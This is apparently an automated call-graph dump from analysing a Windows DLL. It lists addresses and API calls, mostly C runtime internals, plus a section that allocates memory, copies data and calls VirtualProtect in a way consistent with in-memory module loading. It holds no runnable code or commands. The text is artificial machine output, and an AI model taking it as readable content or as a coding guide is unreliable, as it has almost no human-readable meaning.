100165c9 16283->16285 16284->16274 16284->16275 16284->16281 16284->16283 16286 100165e0 GetModuleFileNameA 16285->16286 16287 100165db 16285->16287 16289 10016608 16286->16289 16342 10012d82 16287->16342 16290 100107b6 __getbuf 36 API calls 16289->16290 16291 10016633 16290->16291 16291->16179 16293 100163a3 16292->16293 16296 100163a8 _strlen 16292->16296 16294 10012d82 ___initmbctable 65 API calls 16293->16294 16294->16296 16295 100107b6 __getbuf 36 API calls 16301 100163d9 __lock _strlen 16295->16301 16296->16295 16299 10011264 16296->16299 16297 10016422 16298 100107c8 ___free_lc_time 36 API calls 16297->16298 16298->16299 16299->16180 16304 10011e29 16299->16304 16300 100107b6 __getbuf 36 API calls 16300->16301 16301->16297 16301->16299 16301->16300 16302 10016447 16301->16302 16303 100107c8 ___free_lc_time 36 API calls 16302->16303 16303->16299 16305 10011e32 16304->16305 16307 10011e6e 16305->16307 16502 10011034 16305->16502 16307->16180 16309 10015360 16308->16309 16310 10015383 16308->16310 16311 10015368 FlsGetValue 16309->16311 16312 1001536f 16309->16312 16310->16156 16311->16312 16564 1001520e 16312->16564 16314 10015375 FlsSetValue 16314->16310 16316 10013abc 16315->16316 16316->16207 16316->16211 16318 10011e9f ___free_lc_time 16317->16318 16319 10013a38 __lock 34 API calls 16318->16319 16320 10011ea6 16319->16320 16321 10011eb7 GetCurrentProcess TerminateProcess 16320->16321 16322 10011ec7 __lock 16320->16322 16321->16322 16329 10011f42 16322->16329 16325 10011f50 ___free_lc_time 16325->16214 16326 10011f2f 16333 10011dcf GetModuleHandleA 16326->16333 16330 10011f47 16329->16330 16331 10011f2a 16329->16331 16337 10013983 LeaveCriticalSection 16330->16337 16331->16325 16331->16326 16334 10011df4 ExitProcess 16333->16334 16335 10011dde GetProcAddress 16333->16335 16335->16334 16336 10011dee 16335->16336 16336->16334 16337->16331 16340 100138ee 16338->16340 16339 10019599 __lock 2 API calls 16339->16340 16340->16339 16341 1001391c 16340->16341 16341->16226 16341->16227 16343 10012d8b 16342->16343 16344 10012d92 16342->16344 16346 10012c32 16343->16346 16344->16286 16347 10012c3e ___free_lc_time 16346->16347 16348 10013a38 __lock 36 API calls 16347->16348 16349 10012c49 16348->16349 16350 10012c5d GetOEMCP 16349->16350 16351 10012c6f 16349->16351 16354 10012c86 16350->16354 16352 10012c74 GetACP 16351->16352 16351->16354 16352->16354 16353 10012d61 16370 10012d79 16353->16370 16354->16353 16355 10012cc4 16354->16355 16356 100107b6 __getbuf 36 API calls 16354->16356 16361 10012cd6 16355->16361 16362 10012aa2 16355->16362 16356->16355 16358 10012d70 ___free_lc_time 16358->16344 16360 100107c8 ___free_lc_time 36 API calls 16360->16353 16361->16353 16361->16360 16363 10012ac0 16362->16363 16369 10012aeb ___initmbctable 16362->16369 16364 10012ad7 GetCPInfo 16363->16364 16363->16369 16364->16369 16366 10012c1e 16367 100117ae __lock 36 API calls 16366->16367 16368 10012c30 16367->16368 16368->16361 16369->16366 16373 100128a7 GetCPInfo 16369->16373 16501 10013983 LeaveCriticalSection 16370->16501 16372 10012d80 16372->16358 16374 100128d7 16373->16374 16382 10012999 16373->16382 16383 1001843d 16374->16383 16376 1001294d 16406 10018081 16376->16406 16377 100117ae __lock 36 API calls 16379 10012a31 16377->16379 16379->16366 16380 10012971 16381 10018081 ___initmbctable 61 API calls 16380->16381 16381->16382 16382->16377 16384 10018449 ___free_lc_time 16383->16384 16385 10018453 GetStringTypeW 16384->16385 16386 1001846b 16384->16386 16385->16386 16388 10018473 GetLastError 16385->16388 16387 10018580 16386->16387 16389 1001849e 16386->16389 16450 1001a444 GetLocaleInfoA 16387->16450 16388->16386 16390 100184ba MultiByteToWideChar 16389->16390 16394 1001857a ___free_lc_time 16389->16394 16392 100184e8 __lock ___initmbctable 16390->16392 16390->16394 16400 10018546 MultiByteToWideChar 16392->16400 16403 1001382a __lock 36 API calls 16392->16403 16394->16376 16395 100185cc GetStringTypeA 16395->16394 16397 100185e5 16395->16397 16398 100107c8 ___free_lc_time 36 API calls 16397->16398 16398->16394 16399 100185c0 16399->16394 16399->16395 16401 1001855d GetStringTypeW 16400->16401 16402 1001856e 16400->16402 16401->16402 16402->16394 16405 100107c8 ___free_lc_time 36 API calls 16402->16405 16404 10018537 16403->16404 16404->16394 16404->16400 16405->16394 16407 1001808d ___free_lc_time 16406->16407 16408 10018097 LCMapStringW 16407->16408 16411 100180b2 16407->16411 16409 100180ba GetLastError 16408->16409 16408->16411 16409->16411 16410 100182d9 16413 1001a444 ___initmbctable 50 API calls 16410->16413 16411->16410 16412 10018105 16411->16412 16414 10018126 MultiByteToWideChar 16412->16414 16416 100182d1 ___free_lc_time 16412->16416 16415 10018303 16413->16415 16414->16416 16419 10018154 __lock 16414->16419 16415->16416 16417 1001840a LCMapStringA 16415->16417 16418 1001831c 16415->16418 16416->16380 16438 10018407 16417->16438 16420 1001a487 ___initmbctable 43 API calls 16418->16420 16421 100181b3 MultiByteToWideChar 16419->16421 16423 100107b6 __getbuf 36 API calls 16419->16423 16422 1001832e 16420->16422 16424 100181d0 LCMapStringW 16421->16424 16425 100182b6 16421->16425 16422->16416 16427 10018338 LCMapStringA 16422->16427 16429 100181a0 16423->16429 16424->16425 16430 100181ef 16424->16430 16431 100182c3 16425->16431 16434 100107c8 ___free_lc_time 36 API calls 16425->16434 16426 100107c8 ___free_lc_time 36 API calls 16426->16416 16428 10018357 __lock ___initmbctable 16427->16428 16445 100183d2 16427->16445 16442 100183b5 LCMapStringA 16428->16442 16444 100107b6 __getbuf 36 API calls 16428->16444 16429->16416 16429->16421 16432 10018222 __lock 16430->16432 16433 100181f5 16430->16433 16431->16416 16435 100107c8 ___free_lc_time 36 API calls 16431->16435 16439 1001827d LCMapStringW 16432->16439 16440 100107b6 __getbuf 36 API calls 16432->16440 16433->16425 16437 10018207 LCMapStringW 16433->16437 16434->16431 16435->16416 16436 100107c8 ___free_lc_time 36 API calls 16436->16438 16437->16425 16438->16416 16438->16426 16439->16425 16441 10018295 WideCharToMultiByte 16439->16441 16443 1001826e 16440->16443 16441->16425 16442->16445 16446 100183d6 16442->16446 16443->16425 16443->16439 16449 1001839a ___initmbctable 16444->16449 16445->16436 16445->16438 16448 1001a487 ___initmbctable 43 API calls 16446->16448 16448->16445 16449->16442 16449->16445 16451 1001a473 16450->16451 16452 1001a46e 16450->16452 16482 10012749 16451->16482 16454 100117ae __lock 36 API calls 16452->16454 16455 100185a0 16454->16455 16455->16394 16455->16395 16456 1001a487 16455->16456 16457 1001a493 ___free_lc_time 16456->16457 16458 1001a4ba GetCPInfo 16457->16458 16460 1001a5ca 16457->16460 16459 1001a4cb 16458->16459 16464 1001a4de _strlen 16458->16464 16462 1001a4d1 GetCPInfo 16459->16462 16459->16464 16461 1001a584 16460->16461 16463 100107c8 ___free_lc_time 36 API calls 16460->16463 16466 100117ae __lock 36 API calls 16461->16466 16462->16464 16463->16461 16465 1001a512 MultiByteToWideChar 16464->16465 16469 1001a52c __lock ___initmbctable 16464->16469 16465->16461 16465->16469 16467 1001a64a ___free_lc_time 16466->16467 16467->16399 16468 1001a592 MultiByteToWideChar 16468->16460 16471 1001a5ad 16468->16471 16469->16468 16470 1001382a __lock 36 API calls 16469->16470 16472 1001a57c 16470->16472 16473 1001a5d2 16471->16473 16474 1001a5b2 WideCharToMultiByte 16471->16474 16472->16461 16472->16468 16475 1001a5d7 WideCharToMultiByte 16473->16475 16476 1001a5ed 16473->16476 16474->16460 16475->16460 16475->16476 16477 1001382a __lock 36 API calls 16476->16477 16478 1001a5f5 16477->16478 16478->16460 16479 1001a5fe WideCharToMultiByte 16478->16479 16479->16460 16480 1001a612 16479->16480 16481 100107c8 ___free_lc_time 36 API calls 16480->16481 16481->16460 16483 1001519d __lock 36 API calls 16482->16483 16484 10012750 16483->16484 16487 10012760 16484->16487 16489 10018046 16484->16489 16488 1001278e 16487->16488 16497 10017e3e 16487->16497 16488->16452 16490 10018052 ___free_lc_time 16489->16490 16491 10013a38 __lock 36 API calls 16490->16491 16492 10018059 16491->16492 16493 10017f85 ___initmbctable 36 API calls 16492->16493 16494 10018063 16493->16494 16495 10018078 ___initmbctable LeaveCriticalSection 16494->16495 16496 1001806f ___free_lc_time 16495->16496 16496->16487 16498 10017e53 16497->16498 16499 10017e5c 16497->16499 16498->16487 16500 1001843d ___initmbctable 50 API calls 16499->16500 16500->16498 16501->16372 16505 10010ffc 16502->16505 16504 1001103d 16504->16307 16506 10011008 ___free_lc_time 16505->16506 16513 10011dff 16506->16513 16512 10011025 ___free_lc_time 16512->16504 16514 10013a38 __lock 36 API calls 16513->16514 16515 1001100d 16514->16515 16516 10010f54 16515->16516 16526 100126d3 16516->16526 16518 10010f60 16522 10010fa2 16518->16522 16534 1001234f 16518->16534 16520 10010f8d 16521 1001234f 39 API calls 16520->16521 16520->16522 16521->16522 16523 1001102e 16522->16523 16560 10011e08 16523->16560 16527 100126df ___free_lc_time 16526->16527 16528 10012722 HeapSize 16527->16528 16529 10013a38 __lock 36 API calls 16527->16529 16530 10012735 ___free_lc_time 16528->16530 16531 100126ef ___free_lc_time 16529->16531 16530->16518 16552 10012740 16531->16552 16535 1001235b ___free_lc_time 16534->16535 16536 10012372 16535->16536 16537 10012364 16535->16537 16539 10012385 16536->16539 16540 10012379 16536->16540 16538 100107b6 __getbuf 36 API calls 16537->16538 16545 1001236c ___free_lc_time 16538->16545 16544 100124c0 __getbuf 16539->16544 16550 10012392 __getbuf ___sbh_resize_block ___free_lc_time 16539->16550 16541 100107c8 ___free_lc_time 36 API calls 16540->16541 16541->16545 16542 100124ce HeapReAlloc 16542->16544 16543 10013a38 __lock 36 API calls 16543->16550 16544->16542 16544->16545 16545->16520 16547 1001241e HeapAlloc 16547->16550 16548 10012474 HeapReAlloc 16548->16550 16549 1001437a __getbuf 5 API calls 16549->16550 16550->16543 16550->16545 16550->16547 16550->16548 16550->16549 16551 10013bc6 VirtualFree VirtualFree HeapFree ___free_lc_time 16550->16551 16556 100124b7 16550->16556 16551->16550 16555 10013983 LeaveCriticalSection 16552->16555 16554 1001271c 16554->16528 16554->16530 16555->16554 16559 10013983 LeaveCriticalSection 16556->16559 16558 100124be 16558->16550 16559->16558 16563 10013983 LeaveCriticalSection 16560->16563 16562 10011033 16562->16512 16563->16562 16567 1001521a ___free_lc_time 16564->16567 16565 10015332 ___free_lc_time 16565->16314 16566 10015234 16569 10015242 16566->16569 16571 100107c8 ___free_lc_time 36 API calls 16566->16571 16567->16565 16567->16566 16568 100107c8 ___free_lc_time 36 API calls 16567->16568 16568->16566 16570 10015250 16569->16570 16572 100107c8 ___free_lc_time 36 API calls 16569->16572 16573 1001525e 16570->16573 16574 100107c8 ___free_lc_time 36 API calls 16570->16574 16571->16569 16572->16570 16575 1001526c 16573->16575 16576 100107c8 ___free_lc_time 36 API calls 16573->16576 16574->16573 16577 1001527a 16575->16577 16579 100107c8 ___free_lc_time 36 API calls 16575->16579 16576->16575 16578 1001528b 16577->16578 16580 100107c8 ___free_lc_time 36 API calls 16577->16580 16581 10013a38 __lock 36 API calls 16578->16581 16579->16577 16580->16578 16584 10015293 16581->16584 16582 100152b3 16594 10015340 16582->16594 16584->16582 16587 100107c8 ___free_lc_time 36 API calls 16584->16587 16586 10013a38 __lock 36 API calls 16591 100152c4 16586->16591 16587->16582 16588 10015322 16621 1001534c 16588->16621 16591->16588 16597 10017eb5 16591->16597 16592 100107c8 ___free_lc_time 36 API calls 16592->16565 16624 10013983 LeaveCriticalSection 16594->16624 16596 100152bd 16596->16586 16598 10017f29 16597->16598 16600 10017ec8 16597->16600 16599 10017f52 16598->16599 16602 100107c8 ___free_lc_time 36 API calls 16598->16602 16617 10017f79 16599->16617 16649 1001a17c 16599->16649 16600->16598 16604 10017ef4 16600->16604 16611 100107c8 ___free_lc_time 36 API calls 16600->16611 16601 100107c8 ___free_lc_time 36 API calls 16603 10017f81 16601->16603 16605 10017f44 16602->16605 16603->16588 16612 100107c8 ___free_lc_time 36 API calls 16604->16612 16620 10017f17 16604->16620 16608 100107c8 ___free_lc_time 36 API calls 16605->16608 16606 100107c8 ___free_lc_time 36 API calls 16609 10017f21 16606->16609 16608->16599 16613 100107c8 ___free_lc_time 36 API calls 16609->16613 16615 10017eec 16611->16615 16616 10017f0f 16612->16616 16613->16598 16614 100107c8 ___free_lc_time 36 API calls 16614->16617 16625 1001a36b 16615->16625 16641 1001a30c 16616->16641 16617->16601 16620->16606 16737 10013983 LeaveCriticalSection 16621->16737 16623 1001532c 16623->16592 16624->16596 16626 1001a441 16625->16626 16627 1001a378 16625->16627 16626->16604 16628 1001a394 16627->16628 16631 100107c8 ___free_lc_time 36 API calls 16627->16631 16629 1001a3b1 16628->16629 16633 100107c8 ___free_lc_time 36 API calls 16628->16633 16630 1001a3ce 16629->16630 16634 100107c8 ___free_lc_time 36 API calls 16629->16634 16632 1001a3eb 16630->16632 16637 100107c8 ___free_lc_time 36 API calls 16630->16637 16631->16628 16635 1001a408 16632->16635 16638 100107c8 ___free_lc_time 36 API calls 16632->16638 16633->16629 16634->16630 16636 1001a425 16635->16636 16639 100107c8 ___free_lc_time 36 API calls 16635->16639 16636->16626 16640 100107c8 ___free_lc_time 36 API calls 16636->16640 16637->16632 16638->16635 16639->16636 16640->16626 16642 1001a315 16641->16642 16643 1001a368 16641->16643 16644 1001a32f 16642->16644 16646 100107c8 ___free_lc_time 36 API calls 16642->16646 16643->16620 16645 1001a34c 16644->16645 16647 100107c8 ___free_lc_time 36 API calls 16644->16647 16645->16643 16648 100107c8 ___free_lc_time 36 API calls 16645->16648 16646->16644 16647->16645 16648->16643 16650 1001a189 16649->16650 16651 10017f71 16649->16651 16652 100107c8 ___free_lc_time 36 API calls 16650->16652 16651->16614 16653 1001a191 16652->16653 16654 100107c8 ___free_lc_time 36 API calls 16653->16654 16655 1001a199 16654->16655 16656 100107c8 ___free_lc_time 36 API calls 16655->16656 16657 1001a1a1 16656->16657 16658 100107c8 ___free_lc_time 36 API calls 16657->16658 16659 1001a1a9 16658->16659 16660 100107c8 ___free_lc_time 36 API calls 16659->16660 16661 1001a1b1 16660->16661 16662 100107c8 ___free_lc_time 36 API calls 16661->16662 16663 1001a1b9 16662->16663 16664 100107c8 ___free_lc_time 36 API calls 16663->16664 16665 1001a1c0 16664->16665 16666 100107c8 ___free_lc_time 36 API calls 16665->16666 16667 1001a1c8 16666->16667 16668 100107c8 ___free_lc_time 36 API calls 16667->16668 16669 1001a1d0 16668->16669 16670 100107c8 ___free_lc_time 36 API calls 16669->16670 16671 1001a1d8 16670->16671 16672 100107c8 ___free_lc_time 36 API calls 16671->16672 16673 1001a1e0 16672->16673 16674 100107c8 ___free_lc_time 36 API calls 16673->16674 16675 1001a1e8 16674->16675 16676 100107c8 ___free_lc_time 36 API calls 16675->16676 16677 1001a1f0 16676->16677 16678 100107c8 ___free_lc_time 36 API calls 16677->16678 16679 1001a1f8 16678->16679 16680 100107c8 ___free_lc_time 36 API calls 16679->16680 16681 1001a200 16680->16681 16682 100107c8 ___free_lc_time 36 API calls 16681->16682 16683 1001a208 16682->16683 16684 100107c8 ___free_lc_time 36 API calls 16683->16684 16685 1001a213 16684->16685 16686 100107c8 ___free_lc_time 36 API calls 16685->16686 16687 1001a21b 16686->16687 16688 100107c8 ___free_lc_time 36 API calls 16687->16688 16689 1001a223 16688->16689 16690 100107c8 ___free_lc_time 36 API calls 16689->16690 16691 1001a22b 16690->16691 16692 100107c8 ___free_lc_time 36 API calls 16691->16692 16693 1001a233 16692->16693 16694 100107c8 ___free_lc_time 36 API calls 16693->16694 16695 1001a23b 16694->16695 16696 100107c8 ___free_lc_time 36 API calls 16695->16696 16697 1001a243 16696->16697 16698 100107c8 ___free_lc_time 36 API calls 16697->16698 16699 1001a24b 16698->16699 16700 100107c8 ___free_lc_time 36 API calls 16699->16700 16701 1001a253 16700->16701 16702 100107c8 ___free_lc_time 36 API calls 16701->16702 16703 1001a25b 16702->16703 16704 100107c8 ___free_lc_time 36 API calls 16703->16704 16705 1001a263 16704->16705 16706 100107c8 ___free_lc_time 36 API calls 16705->16706 16707 1001a26b 16706->16707 16708 100107c8 ___free_lc_time 36 API calls 16707->16708 16709 1001a273 16708->16709 16710 100107c8 ___free_lc_time 36 API calls 16709->16710 16711 1001a27b 16710->16711 16712 100107c8 ___free_lc_time 36 API calls 16711->16712 16713 1001a283 16712->16713 16714 100107c8 ___free_lc_time 36 API calls 16713->16714 16715 1001a28b 16714->16715 16716 100107c8 ___free_lc_time 36 API calls 16715->16716 16717 1001a299 16716->16717 16718 100107c8 ___free_lc_time 36 API calls 16717->16718 16719 1001a2a4 16718->16719 16720 100107c8 ___free_lc_time 36 API calls 16719->16720 16721 1001a2af 16720->16721 16722 100107c8 ___free_lc_time 36 API calls 16721->16722 16723 1001a2ba 16722->16723 16724 100107c8 ___free_lc_time 36 API calls 16723->16724 16725 1001a2c5 16724->16725 16726 100107c8 ___free_lc_time 36 API calls 16725->16726 16727 1001a2d0 16726->16727 16728 100107c8 ___free_lc_time 36 API calls 16727->16728 16729 1001a2db 16728->16729 16730 100107c8 ___free_lc_time 36 API calls 16729->16730 16731 1001a2e6 16730->16731 16732 100107c8 ___free_lc_time 36 API calls 16731->16732 16733 1001a2f1 16732->16733 16734 100107c8 ___free_lc_time 36 API calls 16733->16734 16735 1001a2fc 16734->16735 16736 100107c8 ___free_lc_time 36 API calls 16735->16736 16736->16651 16737->16623 16739 100107b6 __getbuf 36 API calls 16738->16739 16740 1000504b 16739->16740 16741 10005052 16740->16741 16742 100107c8 ___free_lc_time 36 API calls 16740->16742 16741->16190 16743 10005077 16742->16743 16743->16190 16745 10005312 16744->16745 16754 1000600e 16744->16754 16746 100056c8 GetNativeSystemInfo 16745->16746 16745->16754 16747 10005753 16746->16747 16748 10005a04 GetProcessHeap HeapAlloc 16747->16748 16747->16754 16749 10005a9d 16748->16749 16750 10005ae8 16748->16750 16749->16203 16751 10005fdb 16750->16751 16753 10005c79 memcpy 16750->16753 16760 1000601b 16751->16760 16797 10004dd0 16751->16797 16776 10002ca0 16753->16776 16754->16203 16756 10005e55 16756->16751 16781 10003f40 16756->16781 16758 10005f8c 16758->16751 16790 10003570 16758->16790 16760->16203 16762 10002453 ??3@YAXPAX 16761->16762 16762->16200 16765 10011141 ___free_lc_time 16764->16765 16810 10016025 16765->16810 16767 1001114e 16815 1001609a 16767->16815 16775 10011182 ___free_lc_time 16775->16193 16777 10003200 16776->16777 16778 10002d9d 16776->16778 16777->16756 16778->16777 16779 10002ed8 memset 16778->16779 16780 100030b3 memcpy 16778->16780 16779->16778 16780->16778 16782 10004001 IsBadReadPtr 16781->16782 16783 10003ff4 16781->16783 16784 100040b7 16782->16784 16785 10004571 16782->16785 16783->16758 16784->16785 16786 1000418e realloc 16784->16786 16788 1000453b IsBadReadPtr 16784->16788 16785->16758 16786->16784 16787 100045a4 16786->16787 16787->16758 16788->16784 16789 10004565 16788->16789 16789->16758 16794 10003644 16790->16794 16791 10003a98 16792 10003310 VirtualProtect 16791->16792 16793 10003aaf 16792->16793 16793->16751 16794->16791 16796 10003ac0 16794->16796 16805 10003310 16794->16805 16796->16751 16798 10005038 16797->16798 16799 10004dde ??3@YAXPAX 16797->16799 16798->16754 16801 10004fbd GetProcessHeap HeapFree 16799->16801 16804 10004e80 ??3@YAXPAX 16799->16804 16801->16798 16804->16801 16806 10003322 16805->16806 16807 1000332b 16805->16807 16806->16794 16808 10003500 VirtualProtect 16807->16808 16809 1000337a 16807->16809 16808->16794 16809->16794 16811 10016039 EnterCriticalSection 16810->16811 16812 1001602e 16810->16812 16811->16767 16813 10013a38 __lock 36 API calls 16812->16813 16814 10016037 16813->16814 16814->16767 16816 100160a7 _write_multi_char 16815->16816 16817 1001115a 16816->16817 16818 100107b6 __getbuf 36 API calls 16816->16818 16819 1001573f 16817->16819 16818->16817 16820 10015f00 16819->16820 16824 10015776 __aulldvrm _strlen 16819->16824 16821 100117ae __lock 36 API calls 16820->16821 16822 1001116a 16821->16822 16830 10016122 16822->16830 16823 100156b1 46 API calls _write_multi_char 16823->16824 16824->16820 16824->16823 16825 100107b6 __getbuf 36 API calls 16824->16825 16826 10019af2 37 API calls 16824->16826 16827 100107c8 ___free_lc_time 36 API calls 16824->16827 16828 100156e4 46 API calls _write_multi_char 16824->16828 16829 10015708 46 API calls 16824->16829 16825->16824 16826->16824 16827->16824 16828->16824 16829->16824 16831 10016129 16830->16831 16832 10011176 16830->16832 16831->16832 16837 10019bb4 16831->16837 16834 10011190 16832->16834 16937 10016077 16834->16937 16836 10011198 16836->16775 16838 10019bc9 16837->16838 16840 10019be5 16837->16840 16838->16840 16841 10019979 16838->16841 16840->16832 16842 10019985 ___free_lc_time 16841->16842 16843 10019a08 16842->16843 16845 100199b0 16842->16845 16844 100136f5 __lock 36 API calls 16843->16844 16846 10019a0d 16844->16846 16859 1001b0ce 16845->16859 16849 100136fe _write_multi_char 36 API calls 16846->16849 16848 100199b6 16850 100199c4 16848->16850 16851 100199d8 16848->16851 16852 100199f8 ___free_lc_time 16849->16852 16868 100197ab 16850->16868 16854 100136f5 __lock 36 API calls 16851->16854 16852->16840 16856 100199dd 16854->16856 16855 100199d0 16895 10019a00 16855->16895 16892 100136fe 16856->16892 16860 1001b0da ___free_lc_time 16859->16860 16861 1001b13c EnterCriticalSection 16860->16861 16862 10013a38 __lock 36 API calls 16860->16862 16867 1001b11f __lock ___free_lc_time 16861->16867 16863 1001b102 16862->16863 16864 1001b119 16863->16864 16866 10019599 __lock 2 API calls 16863->16866 16864->16867 16898 1001b165 16864->16898 16866->16864 16867->16848 16869 100197dc 16868->16869 16889 100197d5 16868->16889 16870 10019815 16869->16870 16902 1001b190 16869->16902 16873 100198f3 WriteFile 16870->16873 16879 10019826 16870->16879 16871 100117ae __lock 36 API calls 16876 10019971 16871->16876 16874 100198ba 16873->16874 16875 1001991b GetLastError 16873->16875 16877 10019931 16874->16877 16882 100198d7 16874->16882 16874->16889 16875->16874 16876->16855 16878 100136f5 __lock 36 API calls 16877->16878 16877->16889 16883 1001994e 16878->16883 16879->16874 16879->16877 16880 1001987c WriteFile 16879->16880 16880->16879 16881 100198bc GetLastError 16880->16881 16881->16874 16884 10019926 16882->16884 16885 100198df 16882->16885 16886 100136fe _write_multi_char 36 API calls 16883->16886 16912 10013707 16884->16912 16888 100136f5 __lock 36 API calls 16885->16888 16886->16889 16890 100198e4 16888->16890 16889->16871 16891 100136fe _write_multi_char 36 API calls 16890->16891 16891->16889 16893 1001519d __lock 36 API calls 16892->16893 16894 10013703 16893->16894 16894->16855 16936 1001b16e LeaveCriticalSection 16895->16936 16897 10019a06 16897->16852 16901 10013983 LeaveCriticalSection 16898->16901 16900 1001b16c 16900->16861 16901->16900 16929 1001b08d 16902->16929 16904 1001b1ac 16905 1001b1c1 SetFilePointer 16904->16905 16906 1001b1b4 16904->16906 16908 1001b1d9 GetLastError 16905->16908 16909 1001b1b9 16905->16909 16907 100136f5 __lock 36 API calls 16906->16907 16907->16909 16908->16909 16910 1001b1e3 16908->16910 16909->16870 16911 10013707 _write_multi_char 36 API calls 16910->16911 16911->16909 16913 1001519d __lock 36 API calls 16912->16913 16914 1001370d 16913->16914 16915 1001373d 16914->16915 16916 10013725 16914->16916 16917 1001519d __lock 36 API calls 16915->16917 16919 1001374e 16916->16919 16921 1001372f 16916->16921 16918 10013742 16917->16918 16918->16889 16920 1001376c 16919->16920 16922 1001375e 16919->16922 16923 1001519d __lock 36 API calls 16920->16923 16924 1001519d __lock 36 API calls 16921->16924 16925 1001519d __lock 36 API calls 16922->16925 16926 10013771 16923->16926 16927 10013734 16924->16927 16928 10013763 16925->16928 16926->16889 16927->16889 16928->16889 16930 1001b099 16929->16930 16931 1001b0b4 16930->16931 16932 100136f5 __lock 36 API calls 16930->16932 16931->16904 16933 1001b0bc 16932->16933 16934 100136fe _write_multi_char 36 API calls 16933->16934 16935 1001b0c7 16934->16935 16935->16904 16936->16897 16938 10016080 16937->16938 16939 1001608b LeaveCriticalSection 16937->16939 16942 10013983 LeaveCriticalSection 16938->16942 16939->16836 16941 10016089 16941->16836 16942->16941 15861 100011a0 15864 100350ea 15861->15864 15863 100011aa 15865 100350f4 __EH_prolog 15864->15865 15874 10035766 15865->15874 15868 1003511a 15882 100373b5 15868->15882 15875 10035770 __EH_prolog 15874->15875 15898 1003570d 15875->15898 15877 10035102 15877->15868 15878 10011f76 15877->15878 15879 10011f7f _strlen 15878->15879 15881 10011f8c __lock 15878->15881 15904 100107b6 15879->15904 15881->15868 15883 10037855 24 API calls 15882->15883 15884 100373c4 15883->15884 15885 10035128 15884->15885 16064 100375b2 15884->16064 15887 10037855 15885->15887 15888 1003785f __EH_prolog 15887->15888 15889 10037884 15888->15889 15894 10037895 15888->15894 16082 1003768d TlsAlloc 15888->16082 16085 10037446 EnterCriticalSection 15889->16085 15893 100378a4 15895 100378aa 15893->15895 15896 1003513a GetCurrentThread GetCurrentThreadId 15893->15896 16095 10037552 EnterCriticalSection 15894->16095 16100 10037732 EnterCriticalSection 15895->16100 15896->15863 15901 100373a5 15898->15901 15902 10037855 24 API calls 15901->15902 15903 10035724 GetCursorPos 15902->15903 15903->15877 15907 1001078a 15904->15907 15908 100107b3 15907->15908 15910 10010791 __getbuf 15907->15910 15908->15881 15910->15908 15911 1001070f 15910->15911 15913 1001071b ___free_lc_time 15911->15913 15912 1001074e 15914 10010769 RtlAllocateHeap 15912->15914 15916 10010778 ___free_lc_time 15912->15916 15913->15912 15921 10013a38 15913->15921 15914->15916 15916->15910 15917 10010736 15928 1001437a 15917->15928 15922 10013a4b 15921->15922 15923 10013a5e EnterCriticalSection 15921->15923 15937 10013998 15922->15937 15923->15917 15925 10013a51 15925->15923 15958 10011400 15925->15958 15931 100143ac 15928->15931 15929 100144cf 15933 10010741 15929->15933 16059 10013f95 15929->16059 15931->15929 15931->15933 16051 10013ede 15931->16051 15934 10010781 15933->15934 16063 10013983 LeaveCriticalSection 15934->16063 15936 10010788 15936->15912 15938 100139a4 ___free_lc_time 15937->15938 15939 100107b6 __getbuf 36 API calls 15938->15939 15943 100139c7 __lock ___free_lc_time 15938->15943 15940 100139bb 15939->15940 15941 100139c2 15940->15941 15942 100139cf 15940->15942 15964 100136f5 15941->15964 15945 10013a38 __lock 36 API calls 15942->15945 15943->15925 15946 100139d6 15945->15946 15947 10013a16 15946->15947 15948 100139de 15946->15948 15949 100107c8 ___free_lc_time 36 API calls 15947->15949 15967 10019599 15948->15967 15951 10013a12 15949->15951 15982 10013a2f 15951->15982 15952 100139e9 15952->15951 15953 100139ef 15952->15953 15972 100107c8 15953->15972 15956 100139f5 15957 100136f5 __lock 36 API calls 15956->15957 15957->15943 15959 1001140a 15958->15959 15960 1001141c 15959->15960 16013 10016b0b 15959->16013 16019 10016994 15960->16019 15985 1001519d GetLastError FlsGetValue 15964->15985 15966 100136fa 15966->15943 15968 100195a5 ___free_lc_time 15967->15968 15969 100195b7 GetModuleHandleA 15968->15969 15971 100195db ___free_lc_time 15968->15971 15970 100195c6 GetProcAddress 15969->15970 15969->15971 15970->15971 15971->15952 15975 100107d4 ___free_lc_time 15972->15975 15973 10010833 ___free_lc_time 15973->15956 15974 10010810 15974->15973 15976 10010825 RtlFreeHeap 15974->15976 15975->15973 15975->15974 15977 10013a38 __lock 35 API calls 15975->15977 15976->15973 15978 100107eb ___free_lc_time 15977->15978 15979 10010805 15978->15979 16002 10013bc6 15978->16002 16008 1001081b 15979->16008 16012 10013983 LeaveCriticalSection 15982->16012 15984 10013a36 15984->15943 15986 10015202 SetLastError 15985->15986 15987 100151b9 15985->15987 15986->15966 15995 1001382a 15987->15995 15989 100151c5 15990 100151fa 15989->15990 15991 100151cd FlsSetValue 15989->15991 15993 10011400 __lock 31 API calls 15990->15993 15991->15990 15992 100151de GetCurrentThreadId 15991->15992 15992->15986 15994 10015201 15993->15994 15994->15986 16001 10013836 __getbuf ___initmbctable ___free_lc_time 15995->16001 15996 100138a3 RtlAllocateHeap 15996->16001 15997 10013a38 __lock 35 API calls 15997->16001 15998 100138cf ___free_lc_time 15998->15989 15999 1001437a __getbuf 5 API calls 15999->16001 16000 100138d4 __lock LeaveCriticalSection 16000->16001 16001->15996 16001->15997 16001->15998 16001->15999 16001->16000 16003 10013c03 16002->16003 16007 10013ea9 __shift 16002->16007 16004 10013def VirtualFree 16003->16004 16003->16007 16005 10013e53 16004->16005 16006 10013e62 VirtualFree HeapFree 16005->16006 16005->16007 16006->16007 16007->15979 16011 10013983 LeaveCriticalSection 16008->16011 16010 10010822 16010->15974 16011->16010 16012->15984 16014 10016b15 16013->16014 16015 10016b42 16014->16015 16016 10016994 __lock 36 API calls 16014->16016 16015->15960 16017 10016b2c 16016->16017 16018 10016994 __lock 36 API calls 16017->16018 16018->16015 16022 100169ba 16019->16022 16020 10016ac2 16037 100117ae 16020->16037 16021 10016ac7 _strlen 16026 10016adc GetStdHandle WriteFile 16021->16026 16022->16020 16022->16021 16024 100169f9 16022->16024 16024->16020 16027 10016a05 GetModuleFileNameA 16024->16027 16026->16020 16028 10016a1f __lock _strncpy _strlen 16027->16028 16030 10019d1d 16028->16030 16031 10019d30 LoadLibraryA 16030->16031 16033 10019d9d 16030->16033 16032 10019d45 GetProcAddress 16031->16032 16031->16033 16032->16033 16034 10019d5c GetProcAddress GetProcAddress 16032->16034 16033->16020 16034->16033 16035 10019d7f GetProcAddress 16034->16035 16035->16033 16036 10019d90 GetProcAddress 16035->16036 16036->16033 16038 10011425 16037->16038 16039 1001177d ___free_lc_time 16037->16039 16038->15923 16043 10016baa 16039->16043 16045 10016bb9 ___free_lc_time 16043->16045 16044 10016bcc 16048 10011f56 